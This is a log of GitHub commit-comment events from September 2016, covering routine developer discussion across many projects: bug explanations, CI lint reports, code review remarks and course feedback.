{"id":"4580699468","type":"CommitCommentEvent","actor":{"login":"cstack"},"repo":{"name":"cstack/osdev"},"payload":{"comment":{"id":19072372,"position":null,"line":null,"path":null,"commit_id":"36e1fa837f57260b97291631bb372593e29a4cf4","created_at":"2016-09-18T21:50:09Z","updated_at":"2016-09-18T21:50:09Z","body":"For future reference, the part of this commit that fixed the problem was the change to pic_acknowledge. The acknowledgment code assumed PIC1 was mapped to interrupts 0x20-0x27 . I haven't changed the defaults, so it's mapped to interrupts 0x8-0x10"}},"created_at":"2016-09-18T21:50:09Z"}
{"id":"4580699530","type":"CommitCommentEvent","actor":{"login":"voku"},"repo":{"name":"voku/Stringy"},"payload":{"comment":{"id":19072373,"position":null,"line":null,"path":null,"commit_id":"3096bc84d887ad3c974410a7e17b369b4f2843d8","created_at":"2016-09-18T21:50:12Z","updated_at":"2016-09-18T21:50:12Z","body":"My motivation for this fork was, to create a OOP adapter for \"Portable UTF8\" (https://github.com/voku/portable-utf8), so I use the lib for nearly all methods of \"Stringy\". \r\n\r\nNow I can use string-functions with OOP-style also for shared-webserver and with good performance if \"mbstring\", \"iconv\", \"intl\" or \"intlChar\" (>= PHP 7) are installed."}},"created_at":"2016-09-18T21:50:12Z"}
{"id":"4580702263","type":"CommitCommentEvent","actor":{"login":"assassin3012"},"repo":{"name":"assassin3012/stack"},"payload":{"comment":{"id":19072375,"position":null,"line":null,"path":null,"commit_id":"42be17b975b1b79a85a8097697dfeb10fb73acd6","created_at":"2016-09-18T21:52:06Z","updated_at":"2016-09-18T21:52:06Z","body":"copy&swap"}},"created_at":"2016-09-18T21:52:06Z"}
{"id":"4580704695","type":"CommitCommentEvent","actor":{"login":"assassin3012"},"repo":{"name":"assassin3012/stack"},"payload":{"comment":{"id":19072381,"position":null,"line":null,"path":null,"commit_id":"8af456e170f7f0309c908934ba0daafb18aa4c46","created_at":"2016-09-18T21:53:50Z","updated_at":"2016-09-18T21:53:50Z","body":"Заработали тесты"}},"created_at":"2016-09-18T21:53:50Z"}
{"id":"4580705445","type":"CommitCommentEvent","actor":{"login":"assassin3012"},"repo":{"name":"assassin3012/stack"},"payload":{"comment":{"id":19072383,"position":null,"line":null,"path":null,"commit_id":"42be17b975b1b79a85a8097697dfeb10fb73acd6","created_at":"2016-09-18T21:54:20Z","updated_at":"2016-09-18T21:54:20Z","body":"copy&swap"}},"created_at":"2016-09-18T21:54:20Z"}
{"id":"4580705592","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19072384,"position":null,"line":null,"path":null,"commit_id":"a809d892aafe6c309238adab9bc3eb5c5758dfb9","created_at":"2016-09-18T21:54:26Z","updated_at":"2016-09-18T21:54:26Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/53/violations\n```\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/utils/__init__.py:176:1: C901 'rotate_image' is too complex (17)\nplone/namedfile/utils/tiff_utils.py:73:1: C901 '_translate_field_type' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-18T21:54:26Z"}
{"id":"4580706720","type":"CommitCommentEvent","actor":{"login":"schmunk42"},"repo":{"name":"schmunk42/yii2-giiant"},"payload":{"comment":{"id":19072386,"position":null,"line":null,"path":null,"commit_id":"cbe3741418b746fca59beb521a80794d1edc3a26","created_at":"2016-09-18T21:55:13Z","updated_at":"2016-09-18T21:55:13Z","body":"There's no class property in the Generator for `generateRelationsFromCurrentSchema`.\r\nDo you develop with notices disabled?\r\n"}},"created_at":"2016-09-18T21:55:13Z"}
{"id":"4580707354","type":"CommitCommentEvent","actor":{"login":"assassin3012"},"repo":{"name":"assassin3012/stack"},"payload":{"comment":{"id":19072387,"position":null,"line":null,"path":null,"commit_id":"e7ea3e2deb644bd8b74ea039453a825a50f64b47","created_at":"2016-09-18T21:55:43Z","updated_at":"2016-09-18T21:55:43Z","body":"Объединил new&copy в newcopy"}},"created_at":"2016-09-18T21:55:43Z"}
{"id":"4580707464","type":"CommitCommentEvent","actor":{"login":"scowalt"},"repo":{"name":"bastimeyer/livestreamer-twitch-gui"},"payload":{"comment":{"id":19072388,"position":null,"line":null,"path":null,"commit_id":"039630be189b8edd4039338c8a3c12ddcf4253ce","created_at":"2016-09-18T21:55:48Z","updated_at":"2016-09-18T21:55:48Z","body":"Uploaded 0.15.2 - https://chocolatey.org/packages/livestreamer-twitch-gui/0.15.2\r\n\r\nWelcome to the club @NGMarmaduke! 😛 "}},"created_at":"2016-09-18T21:55:48Z"}
{"id":"4580708257","type":"CommitCommentEvent","actor":{"login":"assassin3012"},"repo":{"name":"assassin3012/stack"},"payload":{"comment":{"id":19072391,"position":null,"line":null,"path":null,"commit_id":"74546224349c2a5179f81e7db8bb221903361741","created_at":"2016-09-18T21:56:21Z","updated_at":"2016-09-18T21:56:21Z","body":"Доделал тесты"}},"created_at":"2016-09-18T21:56:21Z"}
{"id":"4580708723","type":"CommitCommentEvent","actor":{"login":"assassin3012"},"repo":{"name":"assassin3012/stack"},"payload":{"comment":{"id":19072394,"position":null,"line":null,"path":null,"commit_id":"74546224349c2a5179f81e7db8bb221903361741","created_at":"2016-09-18T21:56:42Z","updated_at":"2016-09-18T21:56:42Z","body":"#Task3 "}},"created_at":"2016-09-18T21:56:42Z"}
{"id":"4580709700","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19072395,"position":null,"line":null,"path":null,"commit_id":"2777c784a110e7b71080b9065d597b61d7538ace","created_at":"2016-09-18T21:57:26Z","updated_at":"2016-09-18T21:57:26Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/54/violations\n```\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/utils/__init__.py:176:1: C901 'rotate_image' is too complex (17)\nplone/namedfile/utils/tiff_utils.py:73:1: C901 '_translate_field_type' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-18T21:57:26Z"}
{"id":"4580710944","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072397,"position":1,"line":1,"path":"README.md","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:58:14Z","updated_at":"2016-09-18T21:58:14Z","body":"# This is a header <The Book of Life1>tag"}},"created_at":"2016-09-18T21:58:14Z"}
{"id":"4580712108","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072398,"position":null,"line":null,"path":null,"commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T21:59:03Z","updated_at":"2016-09-18T21:59:03Z","body":"#The Book if Life<h1>tag"}},"created_at":"2016-09-18T21:59:03Z"}
{"id":"4580713406","type":"CommitCommentEvent","actor":{"login":"Quill88"},"repo":{"name":"Quill88/bigint"},"payload":{"comment":{"id":19072399,"position":null,"line":null,"path":null,"commit_id":"5e8e18d62bc4ffb0c18476d126cdba73971a2c60","created_at":"2016-09-18T21:59:55Z","updated_at":"2016-09-18T21:59:55Z","body":"For example, the following code \r\n```\r\nBigint a(\"555111111111\");\r\nBigint b(\"999999999\");\r\nBigint res = a - b;\r\ncout << to_string(a) << \" - \" << to_string(b) << \" = \" << to_string(res) << endl;\r\n```\r\nbefore fix prints:\r\n```555111111111 - 999999999 = 554888888888```\r\nand after fix it prints more correctly:\r\n```555111111111 - 999999999 = 554111111112```\r\n\r\nExample for next part\r\n```\r\nBigint a(\"555111111111\");\r\nBigint b(\"999999999\");\r\nBigint res = a - a;\r\ncout << to_string(a) << \" - \" << to_string(a) << \" > \" << to_string(b) << endl;\r\ncout << ((res > b) ? \"true\" : \"false\") << endl;\r\n```\r\nwithout fix prints:\r\n```\r\n555111111111 - 555111111111 > 999999999\r\ntrue\r\n```\r\nbecause in res we had number vec with size 2 and two zero elements and comparison code\r\n```if (number.size() < a.number.size()) check; ```\r\nReturn 1 but it's wrong. After fix it prints:\r\n```\r\n555111111111 - 555111111111 > 999999999\r\nfalse\r\n```"}},"created_at":"2016-09-18T21:59:55Z"}
{"id":"4580713603","type":"CommitCommentEvent","actor":{"login":"krizttian"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19072400,"position":null,"line":null,"path":null,"commit_id":"0b50a5cc1a478eb756eea32d5a7baf3abc80956c","created_at":"2016-09-18T22:00:02Z","updated_at":"2016-09-18T22:00:02Z","body":"how extract new db2?"}},"created_at":"2016-09-18T22:00:02Z"}
{"id":"4580713638","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072401,"position":1,"line":1,"path":"README.md","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T22:00:04Z","updated_at":"2016-09-18T22:00:04Z","body":"##The Guadalayians<h2>tag"}},"created_at":"2016-09-18T22:00:04Z"}
{"id":"4580714168","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19072404,"position":null,"line":null,"path":null,"commit_id":"270db5d1c0e116b95de38e2a2c53564399417b40","created_at":"2016-09-18T22:00:17Z","updated_at":"2016-09-18T22:00:17Z","body":"Thanks, @Slayer95!"}},"created_at":"2016-09-18T22:00:17Z"}
{"id":"4580717625","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072406,"position":1,"line":1,"path":"README.md","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T22:02:18Z","updated_at":"2016-09-18T22:02:18Z","body":"*The Guadalayians were the Serifimms and Cheribums of the Tree of Life*"}},"created_at":"2016-09-18T22:02:18Z"}
{"id":"4580719800","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":19072408,"position":null,"line":null,"path":null,"commit_id":"b00eb8b8bde04f43ae1983a30c697889b4154a43","created_at":"2016-09-18T22:03:01Z","updated_at":"2016-09-18T22:03:01Z","body":"unfortunately ``include \"$HOME/.gtkrc-2.0.mine\"`` appears not to be working in shared/.gtkrc-2.0``. Also no luck with ``include \"~/.gtkrc-2.0.mine\"``. Only explicitly ``/home/manjaro/.gtkrc-2.0`` seems to work. Seems we will still need individual **.gtkrc-2-0** files per profile @philmmanjaro @udeved .\r\nI'll revert this tomorrow. Or do you have another idea?"}},"created_at":"2016-09-18T22:03:01Z"}
{"id":"4580719881","type":"CommitCommentEvent","actor":{"login":"Be-ing"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":19072410,"position":null,"line":null,"path":null,"commit_id":"bac0ff9fd4138dd89d623935f3b3e36c22226bd4","created_at":"2016-09-18T22:03:04Z","updated_at":"2016-09-18T22:03:04Z","body":"Did it work?"}},"created_at":"2016-09-18T22:03:04Z"}
{"id":"4580720866","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"loldja/dsp"},"payload":{"comment":{"id":19072411,"position":null,"line":null,"path":null,"commit_id":"8fca956d65fe39efd253086d145fbc66dc055512","created_at":"2016-09-18T22:03:43Z","updated_at":"2016-09-18T22:03:43Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @loldja \r\n\r\nNice work on Python! Here are some comments:\r\n- Q2: Finding an element in a set is much faster than in a list, because set elements are hashable. On the other hand, lists are more efficient for stepping through all the elements.\r\n- Q6, `mix_up(a,b)`: this returns `(a,b)` instead of `a+' '+b` as requested.\r\n- Q7, `sort_last(tuples)`: does not work on `[(1,2,6),(4,5,3)]`, for which it *should* return `[(4, 5, 3),(1, 2, 6)]` (i.e., your code checks the second element of each tuple instead of the last one).\r\n- Q8: The correct answer is *Aston_Villa*, but your code returns *Tottenham*. The problem seems to be that you are popping twice the top row of `parsed_data`.\r\n\r\n👍 "}},"created_at":"2016-09-18T22:03:43Z"}
{"id":"4580721521","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19072412,"position":1,"line":1,"path":"README.md","commit_id":"adc37c026962561a32a341a9cd3fcf97ff5a1405","created_at":"2016-09-18T22:04:08Z","updated_at":"2016-09-18T22:04:08Z","body":"*The Guadalayians were the original Serifimms and Cheribums to the Tree of Life which is the bloodline of Christ the covers the Earth*"}},"created_at":"2016-09-18T22:04:08Z"}
{"id":"4580722075","type":"CommitCommentEvent","actor":{"login":"blacky0x0"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19072415,"position":6,"line":188,"path":"src/main/java/com/github/dzieciou/testing/curl/Http2Curl.java","commit_id":"f66b0931046bcf475d99ee931f4660eba79f3ab4","created_at":"2016-09-18T22:04:30Z","updated_at":"2016-09-18T22:04:30Z","body":"Yep thanks, I've download new version. Unfortunately it still produces an exception when i send such flags as `Secure; HttpOnly;` in cookies. It is not critical so I will wait a new bugfix."}},"created_at":"2016-09-18T22:04:30Z"}
{"id":"4580727522","type":"CommitCommentEvent","actor":{"login":"billy1arm"},"repo":{"name":"mangos/ScriptDev3"},"payload":{"comment":{"id":19072432,"position":null,"line":null,"path":null,"commit_id":"aff34fdbbb99e8ebf09334afd220eaf215562514","created_at":"2016-09-18T22:08:18Z","updated_at":"2016-09-18T22:08:18Z","body":"@Chuck5ta - before we apply this, we need to also commit the DB side of the changes for:\r\na57f630 Commit Ported  SD2 Move from DB to SD2 the blobs flow near\r\nPatchwerk"}},"created_at":"2016-09-18T22:08:18Z"}
{"id":"4580729973","type":"CommitCommentEvent","actor":{"login":"Goldenson"},"repo":{"name":"Goldenson/chat"},"payload":{"comment":{"id":19072436,"position":5,"line":16,"path":"app/channels/application_cable/connection.rb","commit_id":"1bee6351c750492ea19cbca28bec307043f0836d","created_at":"2016-09-18T22:10:02Z","updated_at":"2016-09-18T22:10:02Z","body":"Fix with the right name."}},"created_at":"2016-09-18T22:10:02Z"}
{"id":"4580731383","type":"CommitCommentEvent","actor":{"login":"Goldenson"},"repo":{"name":"Goldenson/chat"},"payload":{"comment":{"id":19072439,"position":12,"line":33,"path":"app/controllers/chatrooms_controller.rb","commit_id":"1bee6351c750492ea19cbca28bec307043f0836d","created_at":"2016-09-18T22:10:59Z","updated_at":"2016-09-18T22:10:59Z","body":"This fixes the behavioral case of when a user creates a chatroom, and it auto-joins without creating the chatroom_user record."}},"created_at":"2016-09-18T22:10:59Z"}
{"id":"4580732549","type":"CommitCommentEvent","actor":{"login":"Goldenson"},"repo":{"name":"Goldenson/chat"},"payload":{"comment":{"id":19072441,"position":12,"line":13,"path":"app/assets/javascripts/chatrooms.coffee","commit_id":"1bee6351c750492ea19cbca28bec307043f0836d","created_at":"2016-09-18T22:11:48Z","updated_at":"2016-09-18T22:11:48Z","body":"Called everytime the document is loaded."}},"created_at":"2016-09-18T22:11:48Z"}
{"id":"4580733244","type":"CommitCommentEvent","actor":{"login":"Goldenson"},"repo":{"name":"Goldenson/chat"},"payload":{"comment":{"id":19072446,"position":15,"line":22,"path":"app/assets/javascripts/channels/chatrooms.coffee","commit_id":"1bee6351c750492ea19cbca28bec307043f0836d","created_at":"2016-09-18T22:12:16Z","updated_at":"2016-09-18T22:12:16Z","body":"Use another ActionCable channel."}},"created_at":"2016-09-18T22:12:16Z"}
{"id":"4580733609","type":"CommitCommentEvent","actor":{"login":"SergeyMalkin"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072447,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T22:12:31Z","updated_at":"2016-09-18T22:12:31Z","body":"This should be range of values, not individual (same for stretch and style)."}},"created_at":"2016-09-18T22:12:31Z"}
{"id":"4580735751","type":"CommitCommentEvent","actor":{"login":"sayantanhore"},"repo":{"name":"sayantanhore/Document-Browser"},"payload":{"comment":{"id":19072450,"position":null,"line":null,"path":null,"commit_id":"010eea695426fb315269325907291f476bf65eff","created_at":"2016-09-18T22:13:54Z","updated_at":"2016-09-18T22:13:54Z","body":"Layout fixed for Safari."}},"created_at":"2016-09-18T22:13:54Z"}
{"id":"4580736424","type":"CommitCommentEvent","actor":{"login":"unknownbrackets"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":19072451,"position":8,"line":519,"path":"GPU/GLES/TextureCache.cpp","commit_id":"2337523fe935e89eb5375be51432aae5ab85757c","created_at":"2016-09-18T22:14:23Z","updated_at":"2016-09-18T22:14:23Z","body":"I'd rather move this out of hashing and log it.  Replacements and Vulkan won't have this either.\r\n\r\nWe should instead check this when `entry->sizeInRAM` changes.  This can only be larger than `sizeInRAM` because it might account for a lower maxV.\r\n\r\n-[Unknown]"}},"created_at":"2016-09-18T22:14:23Z"}
{"id":"4580737010","type":"CommitCommentEvent","actor":{"login":"learner25"},"repo":{"name":"learner25/react-recreate"},"payload":{"comment":{"id":19072453,"position":5,"line":23,"path":"index.html","commit_id":"056c8217ffaa4174031e2df624bee5e530d60c01","created_at":"2016-09-18T22:14:47Z","updated_at":"2016-09-18T22:14:47Z","body":"a new var added"}},"created_at":"2016-09-18T22:14:47Z"}
{"id":"4580737432","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19072455,"position":null,"line":null,"path":null,"commit_id":"155caf938a0cd58600d95ac34ab4652da97bca0e","created_at":"2016-09-18T22:15:06Z","updated_at":"2016-09-18T22:15:06Z","body":"Hmm, maybe bounds SPRT[0..4] would have been appropriate here too?"}},"created_at":"2016-09-18T22:15:06Z"}
{"id":"4580742390","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"FrogCraft-Rebirth/FrogCraft-Rebirth"},"payload":{"comment":{"id":19072466,"position":15,"line":50,"path":"src/main/java/frogcraftrebirth/common/item/ItemJinkela.java","commit_id":"5652e29848bfd2a21d7508da6eac63aaff611164","created_at":"2016-09-18T22:18:40Z","updated_at":"2016-09-18T22:18:40Z","body":"Actually `Collections.singletonList` is better"}},"created_at":"2016-09-18T22:18:40Z"}
{"id":"4580742540","type":"CommitCommentEvent","actor":{"login":"brousseau6933"},"repo":{"name":"syscl/Fix-usb-sleep"},"payload":{"comment":{"id":19072467,"position":null,"line":null,"path":null,"commit_id":"6149bccf4e3321a527679652d98b0b2d551041f3","created_at":"2016-09-18T22:18:47Z","updated_at":"2016-09-18T22:18:47Z","body":"EFI doesn't mount anymore: issue fixed, thanks a lot!!!"}},"created_at":"2016-09-18T22:18:47Z"}
{"id":"4580743083","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"loldja/dsp"},"payload":{"comment":{"id":19072469,"position":null,"line":null,"path":null,"commit_id":"5a4b2b94563f40ef70dd8397f3330264627f54fc","created_at":"2016-09-18T22:19:10Z","updated_at":"2016-09-18T22:19:10Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @loldja \r\n\r\nGood work on the advanced Python problems! Some comments:\r\n- Q1: The faculty lists does not include MBAs or MSPHs, so not need to mention them.\r\n- Q2: \"Assistant Professor is Biostatistics\" is clearly a typo, this should be combined with \"Assistant Professor of Biostatistics\".\r\n- Q8: The order doesn't seem right, you list Bryan, Chen, Ellenberg at the beginning, but it should be Bellamy, Bilker, Bryan.\r\n\r\n👍 "}},"created_at":"2016-09-18T22:19:10Z"}
{"id":"4580743697","type":"CommitCommentEvent","actor":{"login":"syscl"},"repo":{"name":"syscl/Fix-usb-sleep"},"payload":{"comment":{"id":19072470,"position":null,"line":null,"path":null,"commit_id":"6149bccf4e3321a527679652d98b0b2d551041f3","created_at":"2016-09-18T22:19:34Z","updated_at":"2016-09-18T22:19:34Z","body":"@brousseau6933 Nice to hear that, please close that issue and give the star to let more people know it will help them as well:)"}},"created_at":"2016-09-18T22:19:34Z"}
{"id":"4580747528","type":"CommitCommentEvent","actor":{"login":"cityplanningtechdotcom"},"repo":{"name":"cityplanningtechdotcom/cityplanningtechdotcom.github.io"},"payload":{"comment":{"id":19072474,"position":null,"line":null,"path":null,"commit_id":"6af4c4710f218731c7b0b4e0151aba4f67a81aad","created_at":"2016-09-18T22:22:08Z","updated_at":"2016-09-18T22:22:08Z","body":"test"}},"created_at":"2016-09-18T22:22:08Z"}
{"id":"4580748024","type":"CommitCommentEvent","actor":{"login":"Felp86120502"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19072476,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-18T22:22:33Z","updated_at":"2016-09-18T22:22:33Z","body":"Bien sur que je le regarde tous les jours !"}},"created_at":"2016-09-18T22:22:33Z"}
{"id":"4580753970","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19072484,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-18T22:26:59Z","updated_at":"2016-09-18T22:26:59Z","body":"Paul t'on message codé je comprend pas tu me diras a l’école."}},"created_at":"2016-09-18T22:26:59Z"}
{"id":"4580754872","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19072485,"position":null,"line":null,"path":null,"commit_id":"bbdf98038645d8c3326da1f0ed5b38630a61b05e","created_at":"2016-09-18T22:27:44Z","updated_at":"2016-09-18T22:27:44Z","body":"o, i see; then we need to test this to work as we expect it to, probably we could think of doing this drug ordering through forms to use the same order entry API in the future"}},"created_at":"2016-09-18T22:27:44Z"}
{"id":"4580757113","type":"CommitCommentEvent","actor":{"login":"V1RE"},"repo":{"name":"V1RE/telegister"},"payload":{"comment":{"id":19072488,"position":4,"line":3,"path":"index.js","commit_id":"474c4f4841b68fd0242ba9e8bc97475e0c5c6970","created_at":"2016-09-18T22:29:18Z","updated_at":"2016-09-18T22:29:18Z","body":"dont worry, this token is long gone :)"}},"created_at":"2016-09-18T22:29:18Z"}
{"id":"4580757689","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"loldja/dsp"},"payload":{"comment":{"id":19072490,"position":null,"line":null,"path":null,"commit_id":"93fb4f5e8ed84964bf986994ea3ac87540f51fc1","created_at":"2016-09-18T22:29:47Z","updated_at":"2016-09-18T22:29:47Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @loldja \r\n\r\nIt would be nice to see the results you got for the linear algebra problems, either from pencil-and-paper calculations or from Python! \r\n\r\nFor computing the dot product of u and v, just use `np.inner(u,v)`!"}},"created_at":"2016-09-18T22:29:47Z"}
{"id":"4580759197","type":"CommitCommentEvent","actor":{"login":"JulianVolodia"},"repo":{"name":"1PiotrCz/Politikon"},"payload":{"comment":{"id":19072493,"position":null,"line":null,"path":null,"commit_id":"eb264647bbe8aa9bb62e85d4b83de97f33e6f632","created_at":"2016-09-18T22:30:51Z","updated_at":"2016-09-18T22:30:51Z","body":"Piotr, powtórzę się. W tej poprawce nie ma błędu i na tej zmianie (commit) nie powinno być aż tak źle ;)\r\n A przynajmniej nie pamiętam żeby tu był - jeżeli w tej poprawce jest błąd zgłoś go i napisz w jakim miejscu jest, a jeszcze lepiej jeżeli 1) zauważysz/zreprodukujesz błąd 2) naniesiesz własne poprawki 3) przetestujesz że już błędu nie ma ;) (tymczasem jednak - myślę że ta wiedza przyda się na przyszłość)\r\n\r\nZakładam że zbudowałeś maszyny, wykonałeś migrację i załadowałeś te dane na tym commit'cie. Świetnie.\r\nNastępnie przenieś się na świeższy commit i tam strona się wykrzaczyła. Wykonywał się tam kod z korzystający z nowego schematu bazy. Wykonaj migrację (komenda z ReadMe) i wszystkie zmiany powinny poprawić bazę ;) (nie wykonuj ładowania danych drugi raz - póki co chyba nawet się to nie uda ;) ).\r\n\r\nProblem nie był z tą poprawką tylko tym plikiem na innej wersji kodu i tam należy nanieść *inną* poprawkę, zgadzamy się? Czy źle Cię zrozumiałem?\r\nPS Nie blame'ujmy nawet jeżeli mamy \"pewność\" że mamy rację."}},"created_at":"2016-09-18T22:30:51Z"}
{"id":"4580761868","type":"CommitCommentEvent","actor":{"login":"lucasart"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19072495,"position":null,"line":null,"path":null,"commit_id":"d556d5cb251fcefe726ed92cfb0b17fa3c064c44","created_at":"2016-09-18T22:32:51Z","updated_at":"2016-09-18T22:32:51Z","body":"8000 games won't tell you anything. result will be in error bar. you need to run an SPRT to have a conclusive result."}},"created_at":"2016-09-18T22:32:51Z"}
{"id":"4580763898","type":"CommitCommentEvent","actor":{"login":"joeeames"},"repo":{"name":"angular-workshops/angular2-testing"},"payload":{"comment":{"id":19072499,"position":1,"line":1,"path":"src/app/hero.service.isolated.spec.ts","commit_id":"1a445f69887b388cb92d8fc7c0d0547441e8c374","created_at":"2016-09-18T22:34:32Z","updated_at":"2016-09-18T22:34:32Z","body":"ah, nice."}},"created_at":"2016-09-18T22:34:32Z"}
{"id":"4580765238","type":"CommitCommentEvent","actor":{"login":"themutt"},"repo":{"name":"WikiToLearn/WikiToLearnSkin"},"payload":{"comment":{"id":19072506,"position":8,"line":16,"path":"styles/layout/_header.scss","commit_id":"b6ced3b458fc7c180b9896bbfea43f74811f8ae7","created_at":"2016-09-18T22:35:32Z","updated_at":"2016-09-18T22:35:32Z","body":"@crisbal I was referring to this"}},"created_at":"2016-09-18T22:35:32Z"}
{"id":"4580771969","type":"CommitCommentEvent","actor":{"login":"Maxattax97"},"repo":{"name":"Maxattax97/SpensaChallenge"},"payload":{"comment":{"id":19072520,"position":31,"line":73,"path":"js/main.js","commit_id":"f9bd1b688c28b19a6750219d528d8e665b09a74e","created_at":"2016-09-18T22:40:38Z","updated_at":"2016-09-18T22:40:38Z","body":"Forgot a quote!"}},"created_at":"2016-09-18T22:40:38Z"}
{"id":"4580776340","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19072527,"position":null,"line":null,"path":null,"commit_id":"d556d5cb251fcefe726ed92cfb0b17fa3c064c44","created_at":"2016-09-18T22:44:05Z","updated_at":"2016-09-18T22:44:05Z","body":"I don't to waste too much resources.\r\nI just need to know if wins will be more than loses or not, because SPRT would most likely be yellow.\r\nIf yes I will locally work more on this, if not I'm moving to tune something else."}},"created_at":"2016-09-18T22:44:05Z"}
{"id":"4580776656","type":"CommitCommentEvent","actor":{"login":"l2evy"},"repo":{"name":"l2evy/Storage-Crates"},"payload":{"comment":{"id":19072528,"position":null,"line":null,"path":null,"commit_id":"ce31881d415ce235285a6a64c6a4107c96ce42f9","created_at":"2016-09-18T22:44:19Z","updated_at":"2016-09-18T22:44:19Z","body":"Nice work! If I do any new stuff in the future I will most likely go ahead and add to the russian translation in english like this to save you work. Thanks for coming onboard! If you would like credit in any other name than Dragomano please let me know. "}},"created_at":"2016-09-18T22:44:19Z"}
{"id":"4580779325","type":"CommitCommentEvent","actor":{"login":"maximveksler"},"repo":{"name":"datacamp/omniauth-oauth2"},"payload":{"comment":{"id":19072532,"position":null,"line":null,"path":null,"commit_id":"bce2608c3e069cb52b09f18d9c98493937cfebb2","created_at":"2016-09-18T22:46:19Z","updated_at":"2016-09-18T22:46:19Z","body":"which issue does this fix ?"}},"created_at":"2016-09-18T22:46:19Z"}
{"id":"4580780734","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19072534,"position":null,"line":null,"path":null,"commit_id":"f6d2c303fe1d312d6be379d5a526655937eab533","created_at":"2016-09-18T22:47:26Z","updated_at":"2016-09-18T22:47:26Z","body":"GL for long time control!"}},"created_at":"2016-09-18T22:47:26Z"}
{"id":"4580781285","type":"CommitCommentEvent","actor":{"login":"SergeyMalkin"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19072537,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-18T22:47:52Z","updated_at":"2016-09-18T22:47:52Z","body":"Font style may require list of one or more present styles: [regular], [italic], [oblique 50 - 150]"}},"created_at":"2016-09-18T22:47:52Z"}
{"id":"4580785007","type":"CommitCommentEvent","actor":{"login":"hrydgard"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":19072544,"position":8,"line":519,"path":"GPU/GLES/TextureCache.cpp","commit_id":"2337523fe935e89eb5375be51432aae5ab85757c","created_at":"2016-09-18T22:50:41Z","updated_at":"2016-09-18T22:50:41Z","body":"Yeah, you're right. I'll try to find time to do this soon."}},"created_at":"2016-09-18T22:50:41Z"}
